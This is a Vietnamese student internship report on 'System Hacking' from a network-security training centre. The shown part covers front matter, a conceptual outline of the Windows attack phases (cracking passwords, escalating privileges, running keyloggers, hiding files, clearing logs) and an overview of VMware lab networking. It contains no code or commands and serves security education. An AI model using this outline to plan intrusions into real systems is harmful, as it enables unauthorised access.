system hacking

91
TRƯỜNG ĐẠI HỌC KHOA HỌC TỰ NHIÊN KHOA ĐIỆN TỬ VIỄN THÔNG - - - - - - TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG VÀ AN NINH MẠNG QUỐC TẾ ATHENA BÁO CÁO THỰC TẬP SYSTEM HACKING Giảng viên hướng dẫn: Võ Đỗ Thắng Sinh viên thực hiện : Huỳnh Minh Trí

Upload: tri-huynh

Post on 27-Jul-2015

123 views

Category:

Technology


0 download

TRANSCRIPT

Page 1: System Hacking

TR NG Đ I H C KHOA H C T NHIÊNƯỜ Ạ Ọ Ọ Ự

KHOA ĐI N T VI N THÔNGỆ Ử Ễ

- - - - - -

TRUNG TÂM ĐÀO T O QU N TR M NGẠ Ả Ị Ạ

VÀ AN NINH M NG QU C T ATHENAẠ Ố Ế

BÁO CÁO TH C T PỰ Ậ

SYSTEM HACKINGGi ng viên h ng d n: Võ Đ Th ngả ướ ẫ ỗ ắ

Sinh viên th c hi n : Huỳnh Minh Tríự ệ

Thành ph H Chí Minhố ồ

Page 2: System Hacking

System Hacking

M Đ UỞ Ầ

Phát tán virus đã th c s tr thành m t ngành "công nghi p" trong ho tự ự ở ộ ệ ạ

đ ng gián đi p năm 2013, nh d đoán t đ u năm c a Công ty An ninh m ngộ ệ ư ự ừ ầ ủ ạ

Bkav. Ho t đ ng gián đi p này không ch t n t i nh ng n c phát tri n nhạ ộ ệ ỉ ồ ạ ở ữ ướ ể ư

Mỹ, Đ c, Pháp… mà còn hi n h u ngay t i Vi t Nam. Trong năm qua, theo ghiứ ệ ữ ạ ệ

nh n c a Bkav, ph n m m gián đi p đã xu t hi n t i h u h t các c quan quanậ ủ ầ ề ệ ấ ệ ạ ầ ế ơ

tr ng t các c quan Chính ph , Qu c h i t i B Qu c phòng, B Công an hayọ ừ ơ ủ ố ộ ớ ộ ố ộ

các ngân hàng, vi n nghiên c u, tr ng đ i h c… Các ph n m m gián đi p nàyệ ứ ườ ạ ọ ầ ề ệ

l i d ng l h ng an ninh trong file văn b n (Word, Excel, PowerPoint) đ phátợ ụ ỗ ổ ả ể

tán.

Cu i năm 2013, vi c l i d ng các file văn b n đ cài ph n m m gián đi pố ệ ợ ụ ả ể ầ ề ệ

đã ti n thêm m t b c, không c n thông qua l h ng mà chuy n sang s d ngế ộ ướ ầ ỗ ổ ể ử ụ

hình th c phishing. Trung tu n tháng 12, Bkav phát hi n m t lo t các v tin t cứ ầ ệ ộ ạ ụ ặ

chèn mã đ c vào file văn b n không s d ng l h ng. Mã đ c n d i hình th cộ ả ử ụ ỗ ổ ộ ẩ ướ ứ

1 nh thu nh đ c nhúng tr c ti p vào file văn b n. Đ đ c n i dung, ch cả ỏ ượ ự ế ả ể ọ ộ ắ

ch n ng i dùng sẽ click đ m nh l n h n, nh v y sẽ kích ho t mã đ c. Ôngắ ườ ể ở ả ớ ơ ư ậ ạ ộ

Ngô Tu n Anh, Phó ch t ch ph trách An ninh m ng c a Bkav, cho bi t: “V iấ ủ ị ụ ạ ủ ế ớ

hình th c này, b t kỳ máy tính nào cũng sẽ b cài ph n m m gián đi p màứ ấ ị ầ ề ệ

không c n l h ng. Phishing đ cài đ t ph n m m gián đi p sẽ đ c s d ngầ ỗ ổ ể ặ ầ ề ệ ượ ử ụ

r ng rãi và sẽ là xu h ng trong năm 2014”.ộ ướ  

Bài báo cáo này sẽ gi i thi u t ng quát c b n v các ph ng pháp màớ ệ ổ ơ ả ề ươ

Hacker s d ng đ t n công xâm nh p và khai thác vào các phiên b n h đi uử ụ ể ấ ậ ả ệ ề

hành Windows, h đi u hành ph bi n nh t hi n nay t i Vi t Nam, t đó giúpệ ề ổ ế ấ ệ ạ ệ ừ

chúng ta n m rõ cách th c mà Hacker s d ng và đ a ra các gi i pháp giúp choắ ứ ử ụ ư ả

ng i dùng đ c an toàn thông tin, b o m t trong th i đ i Internet ngày nay.ườ ượ ả ậ ờ ạ

Huỳnh Minh Trí Page 1

Page 3: System Hacking

System Hacking

L I C M N KHOA ĐI N T VI N THÔNGỜ Ả Ơ Ệ Ử Ễ

TR NG Đ I H C KHOA H C T NHIÊN TPHCMƯỜ Ạ Ọ Ọ Ự

Em xin chân thành c m n tr ng Đ i H c Khoa H c T Nhiên TPHCM vàả ơ ườ ạ ọ ọ ự

khoa Đi n T Vi n Thông đã t o đi u ki n cho em hoàn thành t t đ t Th cệ ử ễ ạ ề ệ ố ợ ự

T p này. Đ t th c t p này đã cho em nh ng kinh nghi m quý báu. Nh ng kinhậ ợ ự ậ ữ ệ ữ

nghi m này sẽ giúp em hoàn thi n h n trong công vi c và môi tr ng làm vi cệ ệ ơ ệ ườ ệ

sau này.

M c dù em đã c g ng hoàn thành báo cáo th c t p này v i t t c n l cặ ố ắ ự ậ ớ ấ ả ỗ ự

c a b n thân. Nh ng do trình đ hi u bi t và kinh nghi m th c t có h n nênủ ả ư ộ ể ế ệ ự ế ạ

ch c ch n không th tránh kh i nh ng thi u sót nh t đ nh. R t mong nh nắ ắ ể ỏ ữ ế ấ ị ấ ậ

đ c s đóng góp, chia s đ em có th làm t t h n n a. M t l n n a em xinượ ự ẻ ể ể ố ơ ữ ộ ầ ữ

chân thành c m n.ả ơ

TPHCM, ngày 23 tháng 10 năm 2014

Sinh viên th c t pự ậ

Huỳnh Minh Trí

Huỳnh Minh Trí Page 2

Page 4: System Hacking

System Hacking

L I C M N TRUNG TÂM ATHENAỜ Ả Ơ

Em xin c m n giám đ c Công Ty Qu n Tr và An Ninh M ng Qu c Tả ơ ố ả ị ạ ố ế

Athena, cùng các anh ch trong công ty. Đ c bi t, em xin chân thành c m n th yị ặ ệ ả ơ ầ

Đ Võ Th ng và th y Lê Đình Nhân đã nhi t tình giúp đ và h ng d n emỗ ắ ầ ệ ỡ ướ ẫ

trong th i gian th c t p t i công ty. Th y đã t o m i đi u ki n thu n l i, cungờ ự ậ ạ ầ ạ ọ ề ệ ậ ợ

c p nhũng ki n th c c n thi t cũng nh đóng góp nh ng ý ki n quý báu đấ ế ứ ầ ế ư ữ ế ể

hoàn thành t t bài báo cáo này.ố

Em cũng xin g i l i cám n đ n các anh ch , b n bè đã truy n đ t kinhử ờ ơ ế ị ạ ề ạ

nghi m và t o đi u ki n cho em hoàn thành đ tài này.ệ ạ ề ệ ề

Trong quá trình th c hi n đ tài không th không có nh ng sai sót, mongự ệ ề ể ữ

th y cô t i trung tâm ATHENA và các b n th ng th n góp ý đ em rút kinhầ ạ ạ ẳ ắ ề

nghi m trong các công trình tìm hi u, phát tri n sau này.ệ ể ể

M t l n n a tôi xin chân thành c m n.ộ ầ ữ ả ơ

TPHCM, ngày 23 tháng 10 năm 2014

Sinh viên th c t pự ậ

Huỳnh Minh Trí

Huỳnh Minh Trí Page 3

Page 5: System Hacking

System Hacking

GI I THI U CHUNG V CÔNG TY TH C T PỚ Ệ Ề Ự Ậ

Trung Tâm Đào T o Qu n Tr M ng & An Ninh M ng Qu c T ATHENAạ ả ị ạ ạ ố ế

đ c thành l p t năm 2004, là m t t ch c qui t nhi u trí th c tr Vi t Namượ ậ ừ ộ ổ ứ ụ ề ứ ẻ ệ

đ y năng đ ng, nhi t huy t và kinh nghi m trong lãnh v c CNTT, v i tâm huy tầ ộ ệ ế ệ ự ớ ế

góp ph n vào công cu c thúc đ y ti n trình đ a công ngh thông tin là ngànhầ ộ ẩ ế ư ệ

kinh t mũi nh n, góp ph n phát tri n n c nhà.ế ọ ầ ể ướ

Lĩnh v c ho t đ ng chính:ự ạ ộ

– Trung tâm ATHENA đã và đang t p trung ch y u vào đào t o chuyênậ ủ ế ạ

sâu qu n tr m ng, an ninh m ng, th ng m i đi n t theo các tiêu chu n qu cả ị ạ ạ ươ ạ ệ ử ẩ ố

t c a các hãng n i ti ng nh Microsoft, Cisco, Oracle, Linux LPI , CEH,... Songế ủ ổ ế ư

song đó, trung tâm ATHENA còn có nh ng ch ng trình đào t o cao c p dànhữ ươ ạ ấ

riêng theo đ n đ t hàng c a các đ n v nh B Qu c Phòng, B Công An , ngânơ ặ ủ ơ ị ư ộ ố ộ

hàng, doanh nghi p, các c quan chính ph , t ch c tài chính…ệ ơ ủ ổ ứ

– Sau g n 10 năm ho t đ ng,nhi u h c viên t t nghi p trung tâmầ ạ ộ ề ọ ố ệ

ATHENA đã là chuyên gia đ m nh n công tác qu n lý h th ng m ng, an ninhả ậ ả ệ ố ạ

m ng cho nhi u b ngành nh C c Công Ngh Thông Tin - B Qu c Phòng , Bạ ề ộ ư ụ ệ ộ ố ộ

Công An, S Thông Tin Truy n Thông các t nh, b u đi n các t nh,…ở ề ỉ ư ệ ỉ

– Ngoài ch ng trình đào t o, Trung tâm ATHENA còn có nhi u ch ngươ ạ ề ươ

trình h p tác và trao đ i công ngh v i nhi u đ i h c l n nh đ i h c Báchợ ổ ệ ớ ề ạ ọ ớ ư ạ ọ

Khoa Thành Ph H Chí Minh, H c Vi n An Ninh Nhân Dân (Th Đ c), H cố ồ ọ ệ ủ ứ ọ

Vi n B u Chính Vi n Thông, Hi p h i an toàn thông tin (VNISA), Vi n Kỹ Thu tệ ư ễ ệ ộ ệ ậ

Quân S ... ự

Đ i ngũ gi ng viên : ộ ả

– T t c các gi ng viên trung tâm ATHENA có đ u t t nghi p t cácấ ả ả ề ố ệ ừ

tr ng đ i h c hàng đ u trong n c.... T t c gi ng viên ATHENA đ u ph i cóườ ạ ọ ầ ướ ấ ả ả ề ả

các ch ng ch qu c t nh MCSA, MCSE, CCNA, CCNP, Security+, CEH, có b ngứ ỉ ố ế ư ằ

Huỳnh Minh Trí Page 4

Page 6: System Hacking

System Hacking

s ph m Qu c t (Microsoft Certified Trainer). Đây là các ch ng ch chuyênư ạ ố ế ứ ỉ

môn b t bu c đ đ đi u ki n tham gia gi ng d y t i trung tâm ATHENA ắ ộ ể ủ ề ệ ả ạ ạ

– Bên c nh đó, các gi ng viên ATHENA th ng đi tu nghi p và c p nh tạ ả ườ ệ ậ ậ

ki n th c công ngh m i t các n c tiên ti n nh Mỹ , Pháp, Hà Lan,ế ứ ệ ớ ừ ướ ế ư

Singapore... và truy n đ t các công ngh m i này trong các ch ng trình đàoề ạ ệ ớ ươ

t o t i trung tâm ATHENAạ ạ

Liên h :ệ

– C s 1:ơ ở

92 Nguy n Đình Chi u, ph ng Đa Kao, Q1, TPHCMễ ể ườ

Đi n tho i: 0907879477ệ ạ

0943230099

(08)38244041

G n ngã t Đinh Tiên Hoàng - Nguy n Đình Chi uầ ư ễ ể

– C s 2: 2 Bis Đinh Tiên Hoàng, ph ng Đa Kao, Q1, TPHCMơ ở ườ

Đi n tho i: 0943200088 ệ ạ

(08)22103801

C nh sân v n đ ng Hoa L - Cách đài truy n hình Tp HTV 50 mét ạ ậ ộ ư ề

– Website: http://athena.edu.vn

http://athena.com.vn

– E-mail : [email protected] [email protected]

[email protected]

Huỳnh Minh Trí Page 5

Page 7: System Hacking

System Hacking

NH N XÉT C A KHOAẬ Ủ

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

TPHCM, ngày ... tháng ... năm 2014

Huỳnh Minh Trí Page 6

Page 8: System Hacking

System Hacking

NH N XÉT C A TRUNG TÂMẬ Ủ

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

TPHCM, ngày ... tháng ... năm 2014

Giám đ cố

Huỳnh Minh Trí Page 7

Page 9: System Hacking

System Hacking

NH N XÉT C A GI NG VIÊN H NG D NẬ Ủ Ả ƯỚ Ẫ

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

.........................................................................................................................................................................................................................

TPHCM, ngày ... tháng ... năm 2014

Gi ng viên h ng d nả ướ ẫ

Huỳnh Minh Trí Page 8

Page 10: System Hacking

System Hacking

Huỳnh Minh Trí Page 9

Page 11: System Hacking

System Hacking

Huỳnh Minh Trí Page 10

Page 12: System Hacking

System Hacking

PH N 1: GI I THI UẦ Ớ Ệ

1. System Hacking là gì ?

System hacking bao g m nh ng kỹ thu t l y username, password d a vàoồ ữ ậ ấ ự

ph n m m cài trên h th ng ho c tính d cài đ t và ch y các d ch v t xa c aầ ề ệ ố ặ ễ ặ ạ ị ụ ừ ủ

h đi u hành Windows. Nâng quy n trong h th ng, s d ng keyloger đ l yệ ề ề ệ ố ử ụ ể ấ

thông tin, xóa nh ng log file h th ng. M t khi đã xâm nh p vào h th ng,ữ ệ ố ộ ậ ệ ố

Hacker có th th c hi n m i th trên máy tính đó, gây ra nh ng h u qu vôể ự ệ ọ ứ ữ ậ ả

cùng nghiêm tr ng cho các cá nhân, t ch c.ọ ổ ứ

2. Các l h ng th ng khai thác trong h đi u hành Windowsỗ ổ ườ ệ ề

Ph n m m máy tính ngày nay vô cùng ph c t p, bao g m hàng ngàn dòngầ ề ứ ạ ồ

mã. Ph n m m đ c vi t ra b i con ng i, nên cũng ch ng có gì l khi trong đóầ ề ượ ế ở ườ ẳ ạ

có ch a nh ng l i l p trình, đ c bi t đ n v i tên g i l h ng. Nh ng l h ngứ ữ ỗ ậ ượ ế ế ớ ọ ỗ ổ ữ ỗ ổ

này đ c Hacker s d ng đ xâm nh p vào h th ng, cũng nh đ c tác giượ ử ụ ể ậ ệ ố ư ượ ả

c a các đ an mã đ c dùng đ kh i đ ng ch ng trình c a h m t cách t đ ngủ ọ ộ ể ở ộ ươ ủ ọ ộ ự ộ

trên máy tính c a b n.ủ ạ

Hi n nay các l h ng b o m t đ c phát hi n càng nhi u trong các hệ ỗ ổ ả ậ ượ ệ ề ệ

đi u hành, các Web Server hay các ph n m m khác, ... Và các hãng s n xu t luônề ầ ề ả ấ

c p nh t các l h ng và đ a ra các phiên b n m i sau khi đã vá l i các l h ngậ ậ ỗ ổ ư ả ớ ạ ỗ ổ

c a các phiên b n tr c. Do đó, ng i s d ng ph i luôn c p nh t thông tin vàủ ả ướ ườ ử ụ ả ậ ậ

nâng c p phiên b n cũ mà mình đang s d ng n u không các Hacker sẽ l iấ ả ử ụ ế ợ

d ng đi u này đ t n công vào h th ng. Thông th ng, các forum c a các hãngụ ề ể ấ ệ ố ườ ủ

n i ti ng luôn c p nh t các l h ng b o m t và vi c khai thác các l h ng đóổ ế ậ ậ ỗ ổ ả ậ ệ ỗ ổ

nh th nào thì tùy t ng ng i.ư ế ừ ườ

Microsoft luôn có nh ng c i ti n an ninh v t tr i qua m i phiên b n m iữ ả ế ượ ộ ỗ ả ớ

Huỳnh Minh Trí Page 11

Page 13: System Hacking

System Hacking

c a h đi u hành Windows. Tuy nhiên, m t s th t là các m i đe d a m ng v nủ ệ ề ộ ự ậ ố ọ ạ ẫ

đang ngày càng phát tri n nhanh h n so v i chu trình c p nh t và đ i m i hể ơ ớ ậ ậ ổ ớ ệ

đi u hành c a Microsoft.ề ủ

Tr c tiên ta sẽ tìm hi u t ng quát m t quá trình t n công h th ng. M cướ ể ổ ộ ấ ệ ố ụ

tiêu phía tr c c a chúng ta là m t h th ng máy tính. Các b c đ t n công,ướ ủ ộ ệ ố ướ ể ấ

đánh s p nó, có th đ c li t kê nh hình vẽ bên c nh. Nó g m 6 công đo nậ ể ượ ệ ư ạ ồ ạ

nh sau:ư

Quá trình t n công vào m t h th ngấ ộ ệ ố

– Enumerate (li t kê): Trích ra t t c nh ng thông tin có th v userệ ấ ả ữ ể ề

trong h th ng. S d ng ph ng pháp thăm dò SNMP đ có đ c nh ng thôngệ ố ử ụ ươ ể ượ ữ

tin h u ích, chính xác h n. ữ ơ

Huỳnh Minh Trí Page 12

Page 14: System Hacking

System Hacking

– Crack: Công đo n này có lẽ h p d n nhi u Hackernh t. B c này yêuạ ấ ẫ ề ấ ướ

c u chúng ta bẽ khóa m t kh u đăng nh p c a user. Ho c b ng m t cách nàoầ ậ ẩ ậ ủ ặ ằ ộ

khác, m c tiêu ph i đ t t i là quy n truy c p vào h th ng. ụ ả ạ ớ ề ậ ệ ố

– Escalste (leo thang): Nói cho d hi u là chuy n đ i gi i h n truy c pễ ể ể ổ ớ ạ ậ

t user binh th ng lên admin ho c user có quy n cao h n đ cho chúng ta t nừ ườ ặ ề ơ ủ ấ

công.

– Execute (th c thi): Th c thi ng d ng trên h th ng máy đích. Chu nự ự ứ ụ ệ ố ẩ

b tr c malware, keylogger, rootkit…đ ch y nó trên máy tính t n công. ị ướ ể ạ ấ

– Hide ( n file): Nh ng file th c thi, file soucecode ch y ch ng trình…ẩ ữ ự ạ ươ

C n ph i đ c làm n đi, tránh b m c tiêu phát hi n tiêu di t. ầ ả ượ ẩ ị ụ ệ ệ

– Tracks (d u v t): T t nhiên không ph i là đ l i d u v t. Nh ng thôngấ ế ấ ả ể ạ ấ ế ữ

tin có liên quan đ n b n c n ph i b xóa s ch, không đ l i b t c th gì. N uế ạ ầ ả ị ạ ể ạ ấ ứ ứ ế

không kh năng b n b phát hi n là k đ t nh p là r t cao. ả ạ ị ệ ẻ ộ ậ ấ

Tóm l i, quá trình t n công h th ng (System hacking) là b c ti p theoạ ấ ệ ố ướ ế

sau quá trình kh o sát, thu th p thông tin c a m c tiêu c n t n công b ngả ậ ủ ụ ầ ấ ằ

nh ng kỹ thu t nh Footprinting, Social engineering, Enumeration, Googleữ ậ ư

Hacking… đã đ c áp d ng cho m c đích truy tìm thông tin. ượ ụ ụ

Khi h th ng m c tiêu đã đ c xác đ nh, chúng ta b t đ u đi vào quá trìnhệ ố ụ ượ ị ắ ầ

t n công h th ng th t s . Ta ph i ti n hành nh ng kỹ thu t khác nhau đ làmấ ệ ố ậ ự ả ế ữ ậ ể

sao vào đ c trong h th ng đó, th c hi n nh ng vi c mà mình mong mu n,ượ ệ ố ự ệ ữ ệ ố

nh xóa d li u, ch y ch ng trình trojan, keylogger…ư ữ ệ ạ ươ

Huỳnh Minh Trí Page 13

Page 15: System Hacking

System Hacking

PH N 2: VMWARE VÀ O HÓA H ĐI U HÀNHẦ Ả Ệ Ề

1. Gi i thi u VMwareớ ệ

VMware Workstation là m t ph n m mộ ầ ề o hóa desktop m nh mẽả ạ dành

cho các nhà phát tri n/ki m tra ph n m m và các chuyên gia IT c n ch yể ể ầ ề ầ ạ

nhi u HĐH m t lúc trên m t máy PC. Ng i dùng có th ch y các HĐHề ộ ộ ườ ể ạ

Windows, Linux, Netware hay Solaris x86 trên các máy o di đ ng mà khôngả ộ

c n ph i kh i đ ng l i hay phân vùng c ng. VMware Workstation cung c pầ ả ở ộ ạ ổ ứ ấ

kh năng ho t đ ng tuy t v i và nhi u tính năng m i nh t i u hóa b nh vàả ạ ộ ệ ờ ề ớ ư ố ư ộ ớ

kh năng qu n lý các thi t l p nhi u l p. Các tính năng thi t y u nh m ng o,ả ả ế ậ ề ớ ế ế ư ạ ả

ch p nh nhanh tr c ti p, kéo th , chia s th m c và h tr PXE khi nụ ả ự ế ả ẻ ư ụ ỗ ợ ế

VMware Workstation tr thành công c m nh mẽ nh t và không th thi u choở ụ ạ ấ ể ế

các nhà doanh nghi p phát tri n tin h c và các nhà qu n tr h th ng.ệ ể ọ ả ị ệ ố

V i hàng tri u khách hàng và hàng lo t các gi i th ng quan tr ng,ớ ệ ạ ả ưở ọ

VMware Workstation đã đ c ch ng minh là m t công gh giúp tăng năng su tượ ứ ộ ệ ấ

và s linh h at trong công vi c. Đây là m t công c không th thi u cho các nhàự ọ ệ ộ ụ ể ế

phát tri n ph n m m và các chuyên gia IT trên toàn th gi i.ể ầ ề ế ớ

VMware Workstation h at đ ng b ng cách cho phép nhi u HĐH và các ngọ ộ ằ ề ứ

d ng c a chúng ch y đ ng th i trên m t máy duy nh t. Các HĐH và ng d ngụ ủ ạ ồ ờ ộ ấ ứ ụ

này đ c tách ra vào trong các máy o. Nh ng máy o này cùng t n t i trênượ ả ữ ả ồ ạ

m t ph n c ng duy nh t. Các layer o c a VMware sẽ k t n i các ph n c ngộ ầ ứ ấ ả ủ ế ố ầ ứ

v t lý v i các máy o, do đó m i máy o sẽ có CPU, b nh , các đĩa, thi t bậ ớ ả ỗ ả ộ ớ ổ ế ị

nh p/xu t riêng.ậ ấ

Các tính năng cho ng i dùng:ườ

– Thi t l p và th nghi m các ng d ng đa l p, c p nh t ng d ng và cácế ậ ử ệ ứ ụ ớ ậ ậ ứ ụ

Huỳnh Minh Trí Page 14

Page 16: System Hacking

System Hacking

mi ng vá cho HĐH ch trên m t PC duy nh t. ế ỉ ộ ấ

– D dàng ph c h i và chia s các môi tr ng th nghi m đ c l u tr ;ễ ụ ồ ẻ ườ ử ệ ượ ư ữ

gi m thi u các thi t l p trùng l p và th i gian thi t l p. ả ể ế ậ ặ ờ ế ậ

– Làm cho vi c h c t p trên máy tính thu n l i h n do sinh viên luôn đu cệ ọ ậ ậ ợ ơ ợ

s d ng máy v i tình tr ng “s ch sẽ” và th nghi m v i nhi u HĐH, ng d ngử ụ ớ ạ ạ ử ệ ớ ề ứ ụ

cá các công c trên nh ng máy o an tòan và đ c l p.ụ ữ ả ộ ậ

– Ch y các b n demo ph n m m v i các thi t l p ph c t p ho c đa l pạ ả ầ ề ớ ế ậ ứ ạ ặ ớ

trên m t chi c laptop ộ ế

– Tăng t c đ gi i quy t các r c r i c a ng i dùng cu i d a trên m t thố ộ ả ế ắ ố ủ ườ ố ự ộ ư

vi n các máy o đ c thi t l p s n ệ ả ượ ế ậ ẵ

Nh ng tính năng chính:ữ

– H tr nhi u màn hình: B n có th thi t l p đ m t VM tr i r ng raỗ ợ ề ạ ể ế ậ ể ộ ả ộ

nhi u màn hình, ho c nhi u VM, v i m i VM trên m t màn hình riêng bi t. ề ặ ề ớ ỗ ộ ệ

– H tr các thi t b USB 2.0: Bây gi b n đã có th s d ng các thi t bỗ ợ ế ị ờ ạ ể ử ụ ế ị

ng ai vi yêu c u t c đ làm vi c cao trên VM, nh máy MP3 và các thi t b l uọ ầ ố ộ ệ ư ế ị ư

tr di đ ng khác ữ ộ

– VM Record/Replay: B n có th s d ng tính năng này đ thu l i các ho tạ ể ử ụ ể ạ ạ

đ ng c a VM và đ c đ m b o là sẽ tái l p l i tình tr ng c a VM chính xácộ ủ ượ ả ả ậ ạ ạ ủ

100%.

– Integrated Virtual Debugger: Workstation đ c tích h p Visual Studio vàượ ợ

Eclipse nên b n có th tr c ti p s d ng, ch y và vá các l h ng c a cácạ ể ự ế ử ụ ạ ỗ ổ ủ

ch ng trình trong m t VM t m t IDE yêu thích ươ ộ ừ ộ

– Automation APIs (VIX API 2.0): B n có th vi t script hay ch ng trìnhạ ể ế ươ

Huỳnh Minh Trí Page 15

Page 17: System Hacking

System Hacking

đ VM t đ ng th c hi n vi c ki m tra.ể ự ộ ự ệ ệ ể

Cách t o nên các máy o t VMware:ạ ả ừ

Đ s d ng VMware đ u tiên chúng ta c n t o nên m t máy o, n i màể ử ụ ầ ầ ạ ộ ả ơ

chúng ta sẽ dùng đ cài đ t nên các h đi u hành. Chúng ta có th tuỳ ch nể ặ ệ ề ể ọ

dung l ng c ng, dung l ng RAM, cách k t n i m ng c a máy o… Vi c ti pượ ổ ứ ượ ế ố ạ ủ ả ệ ế

theo c n làm là cài đ t nên m t h đi u hành trên máy o đó. Hi n t i, VMwareầ ặ ộ ệ ề ả ệ ạ

h tr cài đ t r t nhi u d ng h đi u hành. Chúng ta có th cài các phiên b nỗ ợ ặ ấ ề ạ ệ ề ể ả

c a Windows, Linux, Unix… trên các máy o VMware. Vi c cài đ t h đi u hànhủ ả ệ ặ ệ ề

trên máy o hoàn toàn t ng t nh cách cài đ t trên các máy th t.ả ươ ự ư ặ ậ

2. Chia s tài nguyên c a các máy o:ẻ ủ ả

Chia s CPU và RAM: Các máy o sẽ chia s CPU và RAM c a máy tính th t.ẻ ả ẻ ủ ậ

Đ đ m b o h th ng có th ch y t t, yêu c u máy tính th t ph i có c u hìnhể ả ả ệ ố ể ạ ố ầ ậ ả ấ

t ng đ i cao, kho ng 1GB RAM đ có th ch y đ ng th i 4, 5 máy o.ươ ố ả ể ể ạ ồ ờ ả

Chia s c ng: Khi t o ra các máy o, chúng ta sẽ t o ra m t c ng dànhẻ ổ ứ ạ ả ạ ộ ổ ứ

riêng cho máy o n m trên máy th t. c ng o này đ c t o trên vùng đĩaả ằ ậ Ổ ứ ả ượ ạ

tr ng c a đĩa th t, do đó không nh h ng đ n các d li u đang có trên đĩaố ủ ổ ậ ả ưở ế ữ ệ ổ

th t. Chúng ta có th tuỳ ch n dung l ng c a c ng này, có th n đ nh ngayậ ể ọ ượ ủ ổ ứ ể ấ ị

dung l ng ho c cũng có th đ dung l ng c a c ng này là đ ng, sẽ thay đ iượ ặ ể ể ượ ủ ổ ứ ộ ổ

tuỳ theo quá trình s d ng c a chúng ta sau này.ử ụ ủ

Chia s card m ng: Sau khi cài đ t lên, VMware s t o nên 2 card m ngẻ ạ ặ ẻ ạ ạ

VMware 1 và VMware 8 trên máy th t và máy th t có th s d ng 2 card m ngậ ậ ể ử ụ ạ

này đ k t n i v i các máy o. Khi l a ch n c u hình m ng cho các máy o, taể ế ố ớ ả ự ọ ấ ạ ả

có th ch n m t trong các ch đ sau:ể ọ ộ ế ộ

– Bridged networking: Card m ng c a máy o sẽ đ c g n tr c ti p v iạ ủ ả ượ ắ ự ế ớ

Huỳnh Minh Trí Page 16

Page 18: System Hacking

System Hacking

card m ng c a máy th t (s d ng switch o VMnet0). Lúc này, máy o sẽ đóngạ ủ ậ ử ụ ả ả

vai trò nh m t máy trong m ng th t, có th nh n DHCP t m ng ngoài, ho cư ộ ạ ậ ể ậ ừ ạ ặ

đ t IP tĩnh cùng d i v i m ng ngoài đ giao ti p v i các máy ngoài m ng ho cặ ả ớ ạ ể ế ớ ạ ặ

lên Internet.

C u trúc m ng Bridged Networkingấ ạ

– NAT: Máy o đ c c u hình NAT sẽ s d ng IP c a máy th t đ giaoả ượ ấ ử ụ ủ ậ ể

ti p v i m ng ngoài. Các máy o đ c c p đ a ch IP nh m t DHCP o c aế ớ ạ ả ượ ấ ị ỉ ờ ộ ả ủ

VMware. Lúc này, các máy o sẽ k t n i v i máy th t qua switch o VMnet8, vàả ế ố ớ ậ ả

máy th t sẽ đóng vai trò NAT server cho các máy o.ậ ả

C u trúc m ng NATấ ạ

– Host-only Networking: Khi c u hình máy o s d ng host-onlyấ ả ử ụ

networking, máy o sẽ đ c k t n i v i máy th t trong m t m ng riêng thôngả ượ ế ố ớ ậ ộ ạ

qua Switch o VMnet1. Đ a ch c a máy o và máy th t trong m ng host-only cóả ị ỉ ủ ả ậ ạ

th đ c c p b i DHCP o g n li n v i Switch o Vmnet1 ho c có th đ t đ aể ượ ấ ở ả ắ ề ớ ả ặ ể ặ ị

ch IP tĩnh cùng d i đ k t n i v i nhau.ỉ ả ể ế ố ớ

Huỳnh Minh Trí Page 17

Page 19: System Hacking

System Hacking

C u trúc m ng Host-Onlyấ ạ

– Ngoài các k t n i trên, ta có th s d ng các switch o trong VMware đế ố ể ử ụ ả ể

k t n i các máy o thành m t h th ng nh mong mu n. Khi cài đ t lên,ế ố ả ộ ệ ố ư ố ặ

VMware t o s n cho chúng ta 10 Switch o t VMnet0 đ n VMnet9. Ngoài cácạ ẵ ả ừ ế

Switch o VMnet0 (dùng cho m ng Bridged Networking), VMnet8 (dùng choả ạ

m ng Nat Networking) và VMnet1 (dùng cho m ng Host-Only Networking),ạ ạ

chúng ta còn 7 Switch o khác đ th c hi n vi c k t n i các máy o. Chúng ta cóả ể ự ệ ệ ế ố ả

th đ t IP đ ng trên các máy n i v i các Switch này đ nh n DHCP o, ho c cóể ặ ộ ố ớ ể ậ ả ặ

th đ t IP tĩnh cùng d i cho các máy này đ m b o chúng k t n i đ c v i nhau.ể ặ ả ả ả ế ố ượ ớ

Chia s đĩa CD-ROM: Các máy o có th s d ng CD-ROM c a máy th t.ẻ ổ ả ể ử ụ ổ ủ ậ

Ngoài ra, ta có th dùng m t file ISO đ đ a vào CD-ROM c a máy o, lúc nàyể ộ ể ư ổ ủ ả

máy o sẽ nh n file ISO gi ng nh m t đĩa CD-ROM trong đĩa c a mình.ả ậ ố ư ộ ổ ủ

3. S d ng Snapshot:ử ụ

